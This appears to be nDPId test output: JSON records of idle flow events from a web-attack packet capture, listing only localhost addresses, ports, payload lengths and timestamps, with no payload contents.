-00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
